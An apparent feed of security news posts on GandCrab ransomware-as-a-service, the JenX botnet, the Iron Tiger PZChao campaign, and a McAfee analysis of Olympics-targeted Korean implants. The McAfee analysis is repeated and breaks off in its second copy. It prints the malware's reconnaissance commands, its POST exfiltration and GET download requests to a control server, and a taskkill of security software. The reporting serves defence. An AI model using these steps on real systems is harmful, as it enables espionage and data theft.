As usually happen for Russian threat actors, members cannot use the ransomware to infect systems in countries in the former Soviet Republics that now comprise the Commonwealth of Independent States.

Below some interesting points from the advertisement:

  • Prospective buyers are asked to join the ‘partner program’, in which profits from the ransomware are split 60:40
  • Large’ partners are able to increase their percentage of proceeds to 70 per cent
  • As a Ransomware-as-a-service offering, technical support and updates are offered to ‘partners’
  • Partners are prohibited from targeting countries in the Commonwealth of Independent States (Azerbaijan, Armenia, Belarus, Kazakhstan, Kyrgyzstan, Moldova, Russia, Tajikistan, Turkmenistan, Uzbekistan and Ukraine) – violating this rule results in account deletion
  • Partners must apply to use the ransomware, and there is a limited amount of ‘seats’ available.” reads the translation of the ad.

The operators behind the RaaS offer they platform maintaining 40% of the ransom, the percentage is reduced to 30% for large partners.

Once infected, if the victim does not pay on time, he will have to pay a double ransom.

Other specific features related to GandCrab RaaS is the that it allows payment using the cryptocurrency Dash and the service is provided by a server hosted on a .bit domain.

The authors of the GandCrab RaaS also offers technical support and updates to its members, they also published a video tutorial that shows how the ransomware is able to avoid antivirus detection.

The RaaS implements a user-friendly admin console, which is accessible via Tor Network, to allow malware customization (i.e. ransom amount, individual bots and encryption masks)

The experts shared the Indicators of Compromise in their blog post.

 

Pierluigi Paganini

(Security Affairs – GandCrab RaaS, cybercrime)

The post GandCrab, a new ransomware-as-a-service emerges from Russian crime underground appeared first on Security Affairs.

JenX botnet leverages Grand Theft Auto videogame community to infect devices

Researchers at security firm Radware have spotted a new IoT botnet, dubbed JenX, the leverages the Grand Theft Auto videogame community to infect devices.

Researchers at security firm Radware have spotted a new IoT botnet, dubbed JenX, that exploits vulnerabilities triggered by the Satori botnet and is leveraging the Grand Theft Auto videogame community to infect devices.

The activity of the Satori botnet has been observed in 2017 by researchers from Check Point security, it uses A Zero-Day vulnerability (CVE-2017-17215) in the Huawei home router HG532.

JenX exploits the CVE-2014-8361 (Realtek SDK Miniigd UPnP SOAP command execution) and CVE-2017-17215 (Huawei Router HG532 arbitrary command execution). that affect Huawei and Realtek routers.

“A new botnet recently started recruiting IoT devices. The botnet uses hosted servers to find and infect new victims leveraging one of two known vulnerabilities that have become popular in IoT botnets recently:

“Both exploit vectors are known from the Satori botnet and based on code that was part of a recent public Pastebin post by the “Janit0r,” author of “BrickerBot.”

JenX also implemented some techniques used by the recently discovered PureMasuta botnet.

The command-and-control server is hosted at the site San Calvicie, which offers multiplayer mod support for Grand Theft Auto: San Andreas, and also DDoS-for-hire service.

JenX is a DDoS botnet, the DDoS  option offered by San Calvicie is called “Corriente Divina.”

The users of the website can rent a GTA San Andreas multiplayer modded server for $16 and a Teamspeak server goes for $9. Adding $20 it is possible to power massive DDoS attacks that can peak 290 and 300 Gbps.

“The Corriente Divina (‘divine stream’) option is described as ‘God’s wrath will be employed against the IP that you provide us,” wrote Radware’s Cyber Security expert Pascal Geenens. “It provides a DDoS service with a guaranteed bandwidth of 90-100 Gbps and attack vectors including Valve Source Engine Query and 32 bytes floods, TS3 scripts and a ‘Down OVH’ option which most probably refers to attacks targeting the hosting service of OVH, a cloud hosting provider that also was a victim of the original Mirai attacks back in September 2016. OVH is well known for hosting multi-player gaming servers such as Minecraft, which was the target of the Mirai attacks at the time.”

jenx botnet

Differently from Satori and PureMasuta botnets, JenX has a centralized infrastructure, it uses a central server to perform the scanning of new hosts.

“The drawback of the central approach is a less than linear growth with the number of deployed servers. Much slower compared to the exponential growth rate of and less aggressive than distributed scanning botnets,” continues the analysis.

The presence of a central server that coordinates the activity makes it easy for law enforcement and security firms to take down the botnet. Of course, threat actors can deploy the control server to the Dark Web making hard take over from law enforcement.

Even if the JenX is able to power massive DDoS attacks, for now, is doesn’t represent a  serious threat because it aims to disrupt services from competing for GTA SA multiplayer servers.

“The botnet is supposed to serve a specific purpose and be used to disrupt services from competing GTA SA multiplayer servers. I do not believe that this will be the botnet that will take down the internet,” Geenens concluded.

“But it does contain some interesting new evolutions and it adds to a list of IoT botnets that is growing longer and faster every month! That said, there is nothing that stops one from using the cheap $20 per target service to perform 290Gbps attacks on business targets and even government related targets. I cannot believe the San Calvicie group would oppose to it.”

Pierluigi Paganini

(Security Affairs – JenX botnet, IoT)

The post JenX botnet leverages Grand Theft Auto videogame community to infect devices appeared first on Security Affairs.

Chinese Iron Tiger APT is back, a close look at the Operation PZChao

Chinese Iron Tiger APT is back, the new campaign, dubbed by Operation PZChao is targeting government, technology, education, and telecommunications organizations in Asia and the US.

Malware researchers from Bitdefender have discovered and monitored for several months the activity of a custom-built backdoor capable of password-stealing, bitcoin-mining, and of course to gain full control of the victim’s machine.

The campaign, dubbed by Bitdefender, Operation PZChao is targeting government, technology, education, and telecommunications organizations in Asia and the US.

“This is also the case of a custom-built piece of malware that we have been monitoring for several months as it wrought havoc in Asia. Our threat intelligence systems picked up the first indicators of compromise in July last year, and we have kept an eye on the threat ever since.” states the report published by BitDefender.
“An interesting feature of this threat, which drew our team to the challenge of analyzing it, is that it features a network of malicious subdomains, each one used for a specific task (download, upload, RAT related actions, malware DLL delivery). The payloads are diversified and include capabilities to download and execute additional binary files, collect private information and remotely execute commands on the system.”

It is interesting to notice that the malware features a network of malicious subdomains, each one used for a specific task (download, upload, RAT related actions, malware DLL delivery).

The experts who analyzed the command and control infrastructure and malicious codes used by the hackers (i.e. Gh0st RAT) speculate the return of the Iron Tiger APT group.

The Iron Tiger APT (aka Panda Emissary or TG-3390) is active at least since 2010 and targeted organization in APAC, but since 2013 it is attacking high-technology targets in the US.

The experts found many similarities between the Gh0stRat samples used in the Operation PZChao and the ones used in past campaigns associated with the Iron Tiger APT.

Attackers behind the Operation PZChao targeted victims with spear-phishing messages using a malicious VBS file attachment that once executed will download the malicious payloads to Windows systems from a distribution server. The researchers determined the IP address of the server, it is “125.7.152.55” in South Korea and hosts the “down.pzchao.com”.

Experts highlighted that new components are downloaded and executed on the target system in every stage of the attack.

Operation PZChao

 

The experts discovered that the first payload dropped onto compromised systems is a bitcoin miner.

The miner is disguised as a ‘java.exe’ file and used every three weeks at 3 am to avoid being noticed while mining cryptocurrency likely to fund the campaign.

But don’t forget that the main goal of the Operation PZChao is cyber espionage, the malicious code leverages two versions of the Mimikatz tool to gather credentials from the infected host.

The most important component in the arsenal of the attacker remains the powerful  Gh0sT RAT malware that allows controlling every aspect of the infected system.

“this remote access Torjan’s espionage capabilities and extensive intelligence harvesting from victims turns it into an extremely powerful tool that is very difficult to identify,”  concluded Bitdefender. “The C&C rotation during the Trojan’s lifecycle also helps evade detection at the network level, while the impersonation of legitimate, known applications takes care of the rest.”

 

Pierluigi Paganini

(Security Affairs –  Iron Tiger APT, Operation PZChao)

The post Chinese Iron Tiger APT is back, a close look at the Operation PZChao appeared first on Security Affairs.

McAfee Blogs: Gold Dragon Widens Olympics Malware Attacks, Gains Permanent Presence on Victims’ Systems

McAfee Advanced Threat Research (ATR) recently released a report describing a fileless attack targeting organizations involved with the Pyeongchang Olympics. The attack used a PowerShell implant that established a channel to the attacker’s server to gather basic system-level data. What was not determined at that time was what occurred after the attacker gained access to the victim’s system.

McAfee ATR has now discovered additional implants that are part of an operation to gain persistence for continued data exfiltration and for targeted access. We have named these implants, which appeared in December 2017, Gold Dragon, Brave Prince, Ghost419, and Running Rat, based on phrases in their code.

On December 24, 2017, our analysts observed the Korean-language implant Gold Dragon. We now believe this implant is the second-stage payload in the Olympics attack that ATR discovered January 6, 2018. The PowerShell implant used in the Olympics campaign was a stager based on the PowerShell Empire framework that created an encrypted channel to the attacker’s server. However, this implant required additional modules to be executed to be a fully capable backdoor. In addition, the PowerShell implant did not contain a mechanism to persist beyond a simple scheduled task. Gold Dragon has a much more robust persistence mechanism than the initial PowerShell implant and enables the attacker to do much more to the target system. Gold Dragon reappeared the same day that the Olympics campaign began.

The Gold Dragon malware appears to have expanded capabilities for profiling a target’s system and sending the results to a control server. The PowerShell implant had only basic data-gathering capabilities—such as username, domain, machine name, and network configuration—which are useful only for identifying interesting victims and launching more complex malware against them.

Gold Dragon

Gold Dragon is a data-gathering implant observed in the wild since December 24. Gold Dragon gets its name from the hardcoded domain www.golddragon.com, which we found throughout the samples.

This sample acts as a reconnaissance tool and downloader for subsequent payloads of the malware infection and payload chain. Apart from downloading and executing binaries from the control server, Gold Dragon generates a key to encrypt data that the implant obtains from the system. This URL is not used for control; the encrypted data is sent to the server ink.inkboom.co.kr, which was used by previous implants as early as May 2017.

Gold Dragon contains elements, code, and similar behavior to implants Ghost419 and Brave Prince, which we have tracked since May 2017. A DLL-based implant created on December 21 (the same day the first malicious Olympics document appeared) was downloaded by a Gold Dragon variant created December 24. This variant was created three days before the targeted spear phishing email with the second document that was sent to 333 victim organizations. The December 24 variant of Gold Dragon used the control server nid-help-pchange.atwebpages.com, which was also used by a Brave Prince variant from December 21.

The first variants of Gold Dragon appeared in the wild in South Korea in July 2017. The original Gold Dragon had the file name 한글추출.exe, which translates as Hangul Extraction and was seen exclusively in South Korea. Five variants of Gold Dragon compiled December 24 appeared heavily during the targeting of the Olympics organizations.

Analyzing Gold Dragon

As part of its initialization, Gold Dragon:

  • Builds its imports by dynamically loading multiple APIs from multiple libraries
  • Gains debug privileges (“SeDebugPrivilege”) for its own process to read remote memory residing in other processes

The malware does not establish persistence for itself but for another component (if it is found) on the system:

  • The malware begins by looking for an instance of the Hangul word processor (HWP) running on the system. (HWP is a Korean word processor similar to Microsoft Word.)

Checking for HWP.exe in the process list.

  • If HWP.exe is found running on the system, the malware finds the currently open file in HWP by extracting the file path from the command-line argument passed to HWP.exe
  • This word file (usually named *.hwp) is copied into the temporary file path

C:\DOCUME~1\<username>\LOCALS~1\Temp\2.hwp

  • hwp is an exact copy of the file loaded into HWP.exe
  • The malware reads the contents of 2.hwp and finds an “MZ magic marker” in the file indicated by the string “JOYBERTM”

Checking for the MZ marker in the HWP file.

  • This marker indicates the presence of an encrypted MZ marker in the .hwp file and is decrypted by the malware and written to the Startup folder for the user:

C:\Documents and Settings\<username>\Start Menu\Programs\Startup\viso.exe

  • This step establishes the persistence of the malware across reboots on the endpoint
  • Once the decrypted MZ marker is written to the Startup folder, the 2.hwp is deleted from the endpoint

The malware might perform this activity for a couple of reasons:

  • Establish persistence for itself on the endpoint
  • Establish persistence of another component of the malware on the endpoint
  • Update itself on endpoint after a separate updater component downloads the update from the control server

The malware has limited reconnaissance and data-gathering capabilities and is not full-fledged spyware. Any information gathered from the endpoint is first stored in the following file, encrypted, and sent to the control server:

  • C:\DOCUME~1\<username>\APPLIC~1\MICROS~1\HNC\1.hwp

The following information is gathered from the endpoint, stored in the file 1.hwp, and sent to the control server:

  • Directory listing of the user’s Desktop folder using command:

cmd.exe /c dir C:\DOCUME~1\<username>\Desktop\ >> C:\DOCUME~1\<username>\APPLIC~1\MICROS~1\HNC\1.hwp

  • Directory listing of the user’s recently accessed files using command:

cmd.exe /c dir C:\DOCUME~1\<username>\Recent >> C:\DOCUME~1\<username>\APPLIC~1\MICROS~1\HNC\1.hwp

  • Directory listing of the system’s %programfiles% folder using command:

cmd.exe /c dir C:\PROGRA~1\ >> C:\DOCUME~1\<username>\APPLIC~1\MICROS~1\HNC\1.hwp

  • Systeminfo of the endpoint using command:

cmd.exe /c systeminfo >> C:\DOCUME~1\<username>\APPLIC~1\MICROS~1\HNC\1.hwp

  • Copies the file ixe000.bin from:

C:\Documents and Settings\<username>\Application Data\Microsoft\Windows\UserProfiles\ixe000.bin

To:

C:\DOCUME~1\<username>\APPLIC~1\MICROS~1\HNC\1.hwp

  • Registry key and value information for the current user’s Run key (with information collected):

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

Number of subkeys

(<KeyIndex>) <KeyName>

Number of Values under each key including the parent Run key

(<ValueIndex>) <Value_Name> <Value_Content>

Registry Run key enumeration by Gold Dragon.

An example of 1.hwp with registry and system information:

Gold Dragon executes these steps executed in the exfiltration process:

  • Once the malware has gathered the required data from the endpoint, it encrypts the data file 1.hwp using the password “www[dot]GoldDragon[dot]com”
  • The encrypted content is written to the data file 1.hwp.
  • During the exfiltration process, the malware Base64-encodes the encrypted data and sends it to its control server using an HTTP POST request to the URL:

http://ink[dot]inkboom.co.kr/host/img/jpg/post.php

  • HTTP data/parameters used in the request include:
    • Content-Type: multipart/form-data; boundary=—-WebKitFormBoundar ywhpFxMBe19cSjFnG <followed by base64 encoded & encrypted system info>
    • User Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; .NET CLR 1.1.4322)
    • Accept-Language: en-us
    • HTTP Version: HTTP/1.0

The malware can also download and execute additional components served to it by the control server. The mechanism for downloading additional components is based on the Computer Name and UserName of the endpoint provided by the malware process to the control server in the following HTTP GET request:

GET http://ink[dot]inkboom.co.kr/host/img/jpg/download.php?filename=<Computer_Name>_<username>&continue=dnsadmin

After successfully retrieving the component from the control server, the next-stage payload is copied to the Application Data directory of the current user and executed:

C:\DOCUME~1\<username>\APPLIC~1\MICROS~1\HNC\hupdate.ex

(note “ex,” not “exe”)

The capability to download additional components from the control server.

The malware demonstrates its evasive behavior by checking for the presence of specific processes related to antimalware products:

  • The presence of any process with the keywords “v3” and “cleaner.”

Checking for antimalware or cleaner processes.

  • If found, these processes are terminated by sending a WM_CLOSE message to their windowing threads.

Terminating an antimalware/cleaner process.

 

Brave Prince

Brave Prince is a Korean-language implant that contains similar code and behavior to the Gold Dragon variants, specifically the system profiling and control server communication mechanism. The malware gathers detailed logs about the victim’s configuration, contents of the hard drive, registry, scheduled tasks, running processes, and more. Brave Prince was first observed in the wild December 13, 2017, sending logs to the attacker via South Korea’s Daum email service. Later variants posted the data to a web server via an HTTP post command, in the same way that Gold Dragon does.

The embedded domain braveprince.com.

The Daum variants of Brave Prince gather information from the system and save it to the file PI_00.dat. This file is sent as an attachment to the attacker’s email address. Later variants upload the file to a web server via an HTTP post command. The type of data this implant gathers from the victim’s system:

  • Directories and files
  • Network configuration
  • Address resolution protocol cache
  • Systemconfig to gather tasks

Both variants of Brave Prince can kill a process associated with a tool created by Daum that can block malicious code. This tool is exclusive to South Korea.

  • taskkill /f /im daumcleaner.exe

The later variants of Brave Prince include the following hardcoded strings:

  • c:\utils\c2ae_uiproxy.exe
  • c:\users\sales\appdata\local\temp\dwrrypm.dl

 

Ghost419

Ghost419 is a Korean-language implant that first appeared in the wild December 18, 2017, with the most recent sample appearing two days before the Olympics spear phishing email. The malware can be identified by the hardcoded string and URL parameter passed to the control server. Ghost419 can be traced to a sample created July 29, 2017, that appears to be a much earlier version (without the hardcoded identifier). The July version shares 46% of its code with samples created in late December. This early version implant creates a unique mutex value (kjie23948_34238958_KJ238742) that also appears in a sample from December, with the exception that one digit has changed. Ghost419 is based on Gold Dragon and Brave Prince implants and contains shared elements and code, especially for system reconnaissance functions.

Hardcoded “Ghost419” in the malware binary.

The string “WebKitFormBoundarywhpFxMBe19cSjFnG,” part of the upload mechanism, also appears in the Gold Dragon variants of late December 2017.

Gold Dragon sample.

Ghost419 sample.

Numerous other similarities are present in addition to system reconnaissance methods; the communication mechanism uses the same user agent string as Gold Dragon.

Gold Dragon user agent string.

Ghost419 user agent string.

 

RunningRat

RunningRat is a remote access Trojan (RAT) that operates with two DLLs. It gets its name from a hardcoded string embedded in the malware. Upon being dropped onto a system, the first DLL executes. This DLL serves three main functions: killing antimalware, unpacking and executing the main RAT DLL, and obtaining persistence. The malware drops the Windows batch file dx.bat, which attempts to kill the task daumcleaner.exe; a Korean security program. The batch file then attempts to remove itself.

The first DLL unpacks a resource file attached to the DLL using a zlib decompression algorithm. The authors of the malware left the debugging strings in the binary, making the algorithm easy to identify. The second DLL is decompressed in memory and never touches the user’s file system; this file is the main RAT that executes. Finally, the first DLL adds the registry key “SysRat,” at SoftWare\Microsoft\Windows\CurrentVersion\Run, to ensure the malware is executed at startup.

After the second DLL is loaded into memory, the first DLL overwrites the IP address for the control server, effectively changing the address the malware will communicate with. This address is hardcoded in the second DLL as 200.200.200.13 and is modified by the first DLL to 223.194.70.136.

This type of behavior may indicate this code is being reused or is part of a malware kit.

The first DLL uses one common antidebugging technique by checking for SeDebugPrivilege.

Once the second DLL is executed, it gathers information about the victim system’s setup, such as operating system version, and driver and processor information.

The malware initiates its main function of capturing user keystrokes and sending them to the control server using standard Windows networking APIs.

From our analysis, stealing keystrokes is the main function of RunningRat; however, the DLL has code for more extensive functionality. Code is included to copy the clipboard, delete files, compress files, clear event logs, shut down the machine, and much more. However, our current analysis shows no way for such code to be executed.

McAfee ATR analysts will continue to research RunningRat to determine if this extra code is used or is possibly left over from a larger RAT toolkit.

The second DLL employs a few additional antidebugging techniques. One is the use of a custom exception handler and code paths that are designed to generate exceptions.

There are also a few random empty-nested threads to slow down researchers during static analysis.

The final antidebugging technique involves GetTickCount performance counters, which are placed within the main sections of code to detect any delay a debugger adds during runtime.

  

Conclusion

The PowerShell script first discovered by McAfee ATR was delivered via a spear phishing campaign that used image stenography techniques to hide the first-stage implant. (For more on steganography, see the McAfee Labs Threats Report, June 2017, page 33.)

The implants covered in this research establish a permanent presence on the victim’s system once the PowerShell implant is executed. The implants are delivered as a second stage once the attacker gains an initial foothold using fileless malware. Some of the implants will maintain their persistence only if Hangul Word, which is specific to South Korea, is running.

With the discovery of these implants, we now have a better understanding of the scope of this operation. Gold Dragon, Brave Prince, Ghost419, and RunningRat demonstrate a much wider campaign than previously known. The persistent data exfiltration we see from these implants could give the attacker a potential advantage during the Olympics.

We thank Charles Crawford and Asheer Malhotra for their support of this analysis.

 

Indicators of Compromise

IPs

  • 194.70.136

Domains

  • 000webhostapp.com
  • 000webhostapp.com
  • 000webhostapp.com
  • nid-help-pchange.atwebpages.com
  • inkboom.co.kr
  • byethost7.com

Hashes

  • fef671c13039df24e1606d5fdc65c92fbc1578d9
  • 06948ab527ae415f32ed4b0f0d70be4a86b364a5
  • 96a2fda8f26018724c86b275fe9396e24b26ec9e
  • ad08a60dc511d9b69e584c1310dbd6039acffa0d
  • c2f01355880cd9dfeef75cff189f4a8af421e0d3
  • 615447f458463dc77f7ae3b0a4ad20ca2303027a
  • bf21667e4b48b8857020ba455531c9c4f2560740
  • bc6cb78e20cb20285149d55563f6fdcf4aaafa58
  • 465d48ae849bbd6505263f3323e818ccb501ba88
  • a9eb9a1734bb84bbc60df38d4a1e02a870962857
  • 539acd9145befd7e670fe826c248766f46f0d041
  • d63c7d7305a8b2184fff3b0941e596f09287aa66
  • 35e5310b6183469f4995b7cd4f795da8459087a4
  • 11a38a9d23193d9582d02ab0eae767c3933066ec
  • e68f43ecb03330ff0420047b61933583b4144585
  • 83706ddaa5ea5ee2cfff54b7c809458a39163a7a
  • 3a0c617d17e7f819775e48f7edefe9af84a1446b
  • 761b0690cd86fb472738b6dc32661ace5cf18893
  • 7e74f034d8aa4570bd1b7dcfcdfaa52c9a139361
  • 5e1326dd7122e2e2aed04ca4de180d16686853a7
  • 6e13875449beb00884e07a38d0dd2a73afe38283
  • 4f58e6a7a04be2b2ecbcdcbae6f281778fdbd9f9
  • 389db34c3a37fd288e92463302629aa48be06e35
  • 71f337dc65459027f4ab26198270368f68d7ae77
  • 5a7fdfa88addb88680c2f0d5f7095220b4bbffc1

 

 

The post Gold Dragon Widens Olympics Malware Attacks, Gains Permanent Presence on Victims’ Systems appeared first on McAfee Blogs.



McAfee Blogs

Gold Dragon Widens Olympics Malware Attacks, Gains Permanent Presence on Victims’ Systems

McAfee Advanced Threat Research (ATR) recently released a report describing a fileless attack targeting organizations involved with the Pyeongchang Olympics. The attack used a PowerShell implant that established a channel to the attacker’s server to gather basic system-level data. What was not determined at that time was what occurred after the attacker gained access to the victim’s system.

McAfee ATR has now discovered additional implants that are part of an operation to gain persistence for continued data exfiltration and for targeted access. We have named these implants, which appeared in December 2017, Gold Dragon, Brave Prince, Ghost419, and Running Rat, based on phrases in their code.

On December 24, 2017, our analysts observed the Korean-language implant Gold Dragon. We now believe this implant is the second-stage payload in the Olympics attack that ATR discovered January 6, 2018. The PowerShell implant used in the Olympics campaign was a stager based on the PowerShell Empire framework that created an encrypted channel to the attacker’s server. However, this implant required additional modules to be executed to be a fully capable backdoor. In addition, the PowerShell implant did not contain a mechanism to persist beyond a simple scheduled task. Gold Dragon has a much more robust persistence mechanism than the initial PowerShell implant and enables the attacker to do much more to the target system. Gold Dragon reappeared the same day that the Olympics campaign began.

The Gold Dragon malware appears to have expanded capabilities for profiling a target’s system and sending the results to a control server. The PowerShell implant had only basic data-gathering capabilities—such as username, domain, machine name, and network configuration—which are useful only for identifying interesting victims and launching more complex malware against them.

Gold Dragon

Gold Dragon is a data-gathering implant observed in the wild since December 24. Gold Dragon gets its name from the hardcoded domain www.golddragon.com, which we found throughout the samples.

This sample acts as a reconnaissance tool and downloader for subsequent payloads of the malware infection and payload chain. Apart from downloading and executing binaries from the control server, Gold Dragon generates a key to encrypt data that the implant obtains from the system. This URL is not used for control; the encrypted data is sent to the server ink.inkboom.co.kr, which was used by previous implants as early as May 2017.

Gold Dragon contains elements, code, and similar behavior to implants Ghost419 and Brave Prince, which we have tracked since May 2017. A DLL-based implant created on December 21 (the same day the first malicious Olympics document appeared) was downloaded by a Gold Dragon variant created December 24. This variant was created three days before the targeted spear phishing email with the second document that was sent to 333 victim organizations. The December 24 variant of Gold Dragon used the control server nid-help-pchange.atwebpages.com, which was also used by a Brave Prince variant from December 21.

The first variants of Gold Dragon appeared in the wild in South Korea in July 2017. The original Gold Dragon had the file name 한글추출.exe, which translates as Hangul Extraction and was seen exclusively in South Korea. Five variants of Gold Dragon compiled December 24 appeared heavily during the targeting of the Olympics organizations.

Analyzing Gold Dragon

As part of its initialization, Gold Dragon:

  • Builds its imports by dynamically loading multiple APIs from multiple libraries
  • Gains debug privileges (“SeDebugPrivilege”) for its own process to read remote memory residing in other processes

The malware does not establish persistence for itself but for another component (if it is found) on the system:

  • The malware begins by looking for an instance of the Hangul word processor (HWP) running on the system. (HWP is a Korean word processor similar to Microsoft Word.)

Checking for HWP.exe in the process list.

  • If HWP.exe is found running on the system, the malware finds the currently open file in HWP by extracting the file path from the command-line argument passed to HWP.exe
  • This word file (usually named *.hwp) is copied into the temporary file path

C:\DOCUME~1\<username>\LOCALS~1\Temp\2.hwp

  • hwp is an exact copy of the file loaded into HWP.exe
  • The malware reads the contents of 2.hwp and finds an “MZ magic marker” in the file indicated by the string “JOYBERTM”

Checking for the MZ marker in the HWP file.

  • This marker indicates the presence of an encrypted MZ marker in the .hwp file and is decrypted by the malware and written to the Startup folder for the user:

C:\Documents and Settings\<username>\Start Menu\Programs\Startup\viso.exe

  • This step establishes the persistence of the malware across reboots on the endpoint
  • Once the decrypted MZ marker is written to the Startup folder, the 2.hwp is deleted from the endpoint

The malware might perform this activity for a couple of reasons:

  • Establish persistence for itself on the endpoint
  • Establish persistence of another component of the malware on the endpoint
  • Update itself on endpoint after a separate updater component downloads the update from the control server

The malware has limited reconnaissance and data-gathering capabilities and is not full-fledged spyware. Any information gathered from the endpoint is first stored in the following file, encrypted, and sent to the control server:

  • C:\DOCUME~1\<username>\APPLIC~1\MICROS~1\HNC\1.hwp

The following information is gathered from the endpoint, stored in the file 1.hwp, and sent to the control server:

  • Directory listing of the user’s Desktop folder using command:

cmd.exe /c dir C:\DOCUME~1\<username>\Desktop\ >> C:\DOCUME~1\<username>\APPLIC~1\MICROS~1\HNC\1.hwp

  • Directory listing of the user’s recently accessed files using command:

cmd.exe /c dir C:\DOCUME~1\<username>\Recent >> C:\DOCUME~1\<username>\APPLIC~1\MICROS~1\HNC\1.hwp

  • Directory listing of the system’s %programfiles% folder using command:

cmd.exe /c dir C:\PROGRA~1\ >> C:\DOCUME~1\<username>\APPLIC~1\MICROS~1\HNC\1.hwp

  • Systeminfo of the endpoint using command:

cmd.exe /c systeminfo >> C:\DOCUME~1\<username>\APPLIC~1\MICROS~1\HNC\1.hwp

  • Copies the file ixe000.bin from:

C:\Documents and Settings\<username>\Application Data\Microsoft\Windows\UserProfiles\ixe000.bin

To:

C:\DOCUME~1\<username>\APPLIC~1\MICROS~1\HNC\1.hwp

  • Registry key and value information for the current user’s Run key (with information collected):

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

Number of subkeys

(<KeyIndex>) <KeyName>

Number of Values under each key including the parent Run key

(<ValueIndex>) <Value_Name> <Value_Content>

Registry Run key enumeration by Gold Dragon.

An example of 1.hwp with registry and system information:

Gold Dragon executes these steps executed in the exfiltration process:

  • Once the malware has gathered the required data from the endpoint, it encrypts the data file 1.hwp using the password “www[dot]GoldDragon[dot]com”
  • The encrypted content is written to the data file 1.hwp.
  • During the exfiltration process, the malware Base64-encodes the encrypted data and sends it to its control server using an HTTP POST request to the URL:

http://ink[dot]inkboom.co.kr/host/img/jpg/post.php

  • HTTP data/parameters used in the request include:
    • Content-Type: multipart/form-data; boundary=—-WebKitFormBoundar ywhpFxMBe19cSjFnG <followed by base64 encoded & encrypted system info>
    • User Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; .NET CLR 1.1.4322)
    • Accept-Language: en-us
    • HTTP Version: HTTP/1.0

The malware can also download and execute additional components served to it by the control server. The mechanism for downloading additional components is based on the Computer Name and UserName of the endpoint provided by the malware process to the control server in the following HTTP GET request:

GET http://ink[dot]inkboom.co.kr/host/img/jpg/download.php?filename=<Computer_Name>_<username>&continue=dnsadmin

After successfully retrieving the component from the control server, the next-stage payload is copied to the Application Data directory of the current user and executed:

C:\DOCUME~1\<username>\APPLIC~1\MICROS~1\HNC\hupdate.ex

(note “ex,” not “exe”)

The capability to download additional components from the control server.

The malware demonstrates its evasive behavior by checking for the presence of specific processes related to antimalware products:

  • The presence of any process with the keywords “v3” and “cleaner.”

Checking for antimalware or cleaner processes.

  • If found, these processes are terminated by sending a WM_CLOSE message to their windowing threads.

Terminating an antimalware/cleaner process.

 

Brave Prince

Brave Prince is a Korean-language implant that contains similar code and behavior to the Gold Dragon variants, specifically the system profiling and control server communication mechanism. The malware gathers detailed logs about the victim’s configuration, contents of the hard drive, registry, scheduled tasks, running processes, and more. Brave Prince was first observed in the wild December 13, 2017, sending logs to the attacker via South Korea’s Daum email service. Later variants posted the data to a web server via an HTTP post command, in the same way that Gold Dragon does.

The embedded domain braveprince.com.

The Daum variants of Brave Prince gather information from the system and save it to the file PI_00.dat. This file is sent as an attachment to the attacker’s email address. Later variants upload the file to a web server via an HTTP post command. The type of data this implant gathers from the victim’s system:

  • Directories and files
  • Network configuration
  • Address resolution protocol cache
  • Systemconfig to gather tasks

Both variants of Brave Prince can kill a process associated with a tool created by Daum that can block malicious code. This tool is exclusive to South Korea.

  • taskkill /f /im daumcleaner.exe

The later variants of Brave Prince include the following hardcoded strings:

  • c:\utils\c2ae_uiproxy.exe
  • c:\users\sales\appdata\local\temp\dwrrypm.dl

 

Ghost419

Ghost419 is a Korean-language implant that first appeared in the wild December 18, 2017, with the most recent sample appearing two days before the Olympics spear phishing email. The malware can be identified by the hardcoded string and URL parameter passed to the control server. Ghost419 can be traced to a sample created July 29, 2017, that appears to be a much earlier version (without the hardcoded identifier). The July version shares 46% of its code with samples created in late December. This early version implant creates a unique mutex value (kjie23948_34238958_KJ238742) that also appears in a sample from December, with the exception that one digit has changed. Ghost419 is based on Gold Dragon and Brave Prince implants and contains shared elements and code, especially for system reconnaissance functions.

Hardcoded “Ghost419” in the malware binary.

The string “WebKitFormBoundarywhpFxMBe19cSjFnG,” part of the upload mechanism, also appears in the Gold Dragon variants of late December 2017.

Gold Dragon sample.

Ghost419 sample.

Numerous other similarities are present in addition to system reconnaissance methods; the communication mechanism uses the same user agent string as Gold Dragon.

Gold Dragon user agent string.

Ghost419 user agent string.

 

RunningRat

RunningRat is a remote access Trojan (RAT) that operates with two DLLs. It gets its name from a hardcoded string embedded in the malware. Upon being dropped onto a system, the first DLL executes. This DLL serves three main functions: killing antimalware, unpacking and executing the main RAT DLL, and obtaining persistence. The malware drops the Windows batch file dx.bat, which attempts to kill the task daumcleaner.exe; a Korean security program. The batch file then attempts to remove itself.

The first DLL unpacks a resource file attached to the DLL using a zlib decompression algorithm. The authors of the malware left the debugging strings in the binary, making the algorithm easy to identify. The second DLL is decompressed in memory and never touches the user’s file system; this file is the main RAT that executes. Finally, the first DLL adds the registry key “SysRat,” at SoftWare\Microsoft\Windows\CurrentVersion\Run, to ensure the malware is executed at startup.

After the second DLL is loaded into memory, the first DLL overwrites the IP address for the control server, effectively changing the address the malware will communicate with. This address is hardcoded in the second DLL as 200.200.200.13 and is modified by the first DLL to 223.194.70.136.

This type of behavior may indicate this code is being reused or is part of a malware kit.

The first DLL uses one common antidebugging technique by checking for SeDebugPrivilege.

Once the second DLL is executed, it gathers information about the victim system’s setup, such as operating system version, and driver and processor information.

The malware initiates its main function of capturing user keystrokes and sending them to the control server using standard Windows networking APIs.

From our analysis, stealing keystrokes is the main function of RunningRat; however, the DLL has code for more extensive functionality. Code is included to copy the clipboard, delete files, compress files, clear event logs, shut down the machine, and much more. However, our current analysis shows no way for such code to be executed.

McAfee ATR analysts will continue to research RunningRat to determine if this extra code is used or is possibly left over from a larger RAT toolkit.

The second DLL employs a few additional antidebugging techniques. One is the use of a custom exception handler and code paths that are designed to generate exceptions.

There are also a few random empty-nested threads to slow down researchers during static analysis.

The final antidebugging technique involves GetTickCount performance counters, which are placed within the main sections of code to detect any delay a debugger adds during runtime.

  

Conclusion

The PowerShell script first discovered by McAfee ATR was delivered via a spear phishing campaign that used image stenography techniques to hide the first-stage implant. (For more on steganography, see the McAfee Labs Threats Report, June 2017, page 33.)

